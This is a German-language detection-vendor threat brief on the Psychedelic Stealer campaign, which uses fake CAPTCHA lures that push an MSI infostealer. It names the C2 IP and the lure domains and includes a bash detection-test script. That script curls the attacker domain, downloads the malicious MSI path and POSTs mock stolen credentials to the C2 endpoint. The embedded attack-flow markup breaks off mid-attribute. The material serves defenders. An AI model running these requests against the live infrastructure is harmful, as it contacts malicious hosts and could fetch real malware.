SOC Prime Bias: High

25 Sep 2026 14:16 UTC

Der Psychedelische Dieb: Wenn ein CAPTCHA zu einem Installer wird

Author Photo
SOC Prime Team linkedin icon Folgen
Der Psychedelische Dieb: Wenn ein CAPTCHA zu einem Installer wird
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Arctic Wolf Labs verfolgt eine Kampagne, die gefälschte Cloudflare-CAPTCHA-Köder nutzt, die in kompromittierte ukrainische Geschäftswesites injiziert werden. Der ClickFix-ähnliche Angriff überzeugt Benutzer, ein MSI-Paket auszuführen, das Psychedelic Stealer installiert, einen Infostealer, der darauf ausgelegt ist, Browser-Anmeldedaten, Kontotoken und Kryptowährungs-Wallet-Daten zu sammeln. Die Malware unterstützt auch persistente Fernsteuerungstasks durch dedizierte C2-Infrastruktur.

Untersuchung

Die Untersuchung deckte injizierte iframes auf legitimen ukrainischen Webseiten auf, die Besucher in einen gefälschten Verifizierungsablauf umleiten. Analysten identifizierten auch ein Köder-Management-Panel, das mit Rublevka TDS gebrandet ist und die Befehlskonfigurationen steuert und die Besucher-Telemetrie aufzeichnet. Die technische Analyse der MSI-Nutzlast enthüllte eine verschlüsselte URL der nächsten Stufe sowie die Kernroutinen der Malware für Anmelde- und Datendiebstahl.

Abschwächung

Organisationen sollten die verdächtige Ausführung von Windows Installer (msiexec.exe) überwachen, die von Webbrowsern oder Kommandozeilenschnittstellen gestartet werden. Webfilter sollten bekannte bösartige Domains blockieren, während Verteidiger auch legitime Webressourcen auf unautorisierte iframe-Injektionen überwachen sollten. Die Stärkung der Endpunktschutzmaßnahmen bei der Erstellung geplanter Tasks kann das Beständigkeitsrisiko weiter verringern.

Reaktion

Wird Psychedelic Stealer-Aktivität festgestellt, sollten betroffene Endpunkte isoliert werden, um weitere Datenexfiltration oder laterale Bewegungen zu stoppen. Browser-Profile und lokalen Speicher auf kompromittierte Anmeldedaten, Authentifizierungstoken und Wallet-Daten überprüfen. Netzwerk-Telemetrie auf Kommunikation mit bekannter C2-Infrastruktur überprüfen und Systeme auf unautorisierte geplante Tasks oder verdächtige native Messaging-Hosts inspizieren.

<div class="wp-block-socprime-category-attack-flow attack-flow-class" data-title="Attack Flow" data-attack-flow="flowchart TDn step_drive_by["T1189 – Drive-by Compromise<br>Inject iframe into legitimate websites to load malicious script from fsputnik.com"]n step_input_capture["T1056 – Input Capture<br>Use JavaScript helper to copy a malicious Windows Installer command to the clipboard via fake Cloudflare CAPTCHA"]n step_ingress_transfer["T1105 – Ingress Tool Transfer<br>Download and install Psychedelic Stealer via msiexec.exe"]n rules_for_ingress_transfer("<b>Rule Name</b>: Suspicious File Download Direct IP (via proxy)<br/><b>Rule ID</b>: 0fa3da37-f604-4547-939f-1ec135990aad")n step_persistence["T1053.005 – Scheduled Task/Job: Scheduled Task<br>Establish persistence using a scheduled task named psychedelicloveUtils"]n step_credential_theft["Steal passwords and account tokens from Chromium-based browsers"]n step_c2_communication["T1071 – Application Layer Protocol<br>Communicate with C2 server at 193.178.159.128 to retrieve tasks and payloads"]n rules_for_c2_communication("<b>Rule Name</b>: Possible C2 Communications Over HTTP To Direct IP With Uncommon Port (via proxy)<br/><b>Rule ID

Angriffsablauf

Erkennungen

Verdächtiger RunMRU-Eintrag mit LOLBin-Semantik (über registry_event)

SOC Prime Team
25. Sep 2026

Möglicher Remote-MSI-Datei-Installationsversuch (über cmdline)

SOC Prime Team
25. Sep 2026

Mögliche C2-Kommunikation über HTTP zu direkter IP mit ungewöhnlichem Port (über Proxy)

SOC Prime Team
25. Sep 2026

Verdächtiger Dateidownload direkte IP (über Proxy)

SOC Prime Team
25. Sep 2026

IOCs (HashSha256) zum Erkennen: The Psychedelic Stealer: Wenn ein CAPTCHA zu einem Installer wird

SOC Prime AI Regeln
25. Sep 2026

IOCs (SourceIP) zum Erkennen: The Psychedelic Stealer: Wenn ein CAPTCHA zu einem Installer wird

SOC Prime AI Regeln
25. Sep 2026

IOCs (DestinationIP) zum Erkennen: The Psychedelic Stealer: Wenn ein CAPTCHA zu einem Installer wird

SOC Prime AI Regeln
25. Sep 2026

Erkennung des Zugriffs auf die Psychedelic Stealer-Infrastruktur [Webserver]

SOC Prime AI Regeln
25. Sep 2026

Simulationsausführung

  • Angriffsnarrativ & Befehle: Der Angreifer beabsichtigt, ein Ziel über einen gefälschten CAPTCHA-Mechanismus zu infizieren. Die Simulation wird das Verhalten des Browsers des Opfers nachahmen: Zuerst zum Einstiegspunkt des Angreifers navigieren, um erste Kontrollen zu umgehen, dann die bösartige MSI-Nutzlast anfordern und schließlich eine C2-Verbindung über einen HTTP-POST zu dem Steuerungsskript des Angreifers initiieren. Diese Abfolge soll die genauen URI-Muster nachahmen, die in der Psychedelic Stealer-Infrastruktur identifiziert wurden.

  • Regressionstest-Skript: Das folgende Skript verwendet curl um die drei verschiedenen Phasen der Erkennungslogik zu simulieren.

    #!/bin/bash
    # Simulationsskript für Zugang zur Psychedelic Stealer-Infrastruktur
    
    TARGET_DOMAIN="uasputnik.com"
    
    echo "[+] Start der Psychedelic Stealer Infrastruktur-Simulation..."
    
    # Phase 1: Besuchen der Einstiegsseite simulieren (Auswahl 1)
    echo "[*] GET-Anfrage zur Einstiegsseite simulieren..."
    curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null
    
    # Phase 2: Herunterladen der bösartigen MSI simulieren (Auswahl 2)
    echo "[*] GET-Anfrage für Nutzlast simulieren..."
    curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null
    
    # Phase 3: C2-Kommunikation über POST simulieren (Auswahl 3)
    echo "[*] POST-Anfrage an C2-Endpunkt simulieren..."
    curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null
    
    echo "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Warnungen."
  • Bereinigungskommandos:

    # Da dies eine netzwerkbasierte Simulation ist, werden keine Dateien auf dem lokalen System erstellt
    # es sei denn, es wird ausdrücklich verlangt. Keine Bereinigung des lokalen Dateisystems erforderlich.
    echo "[+] Bereinigung abgeschlossen."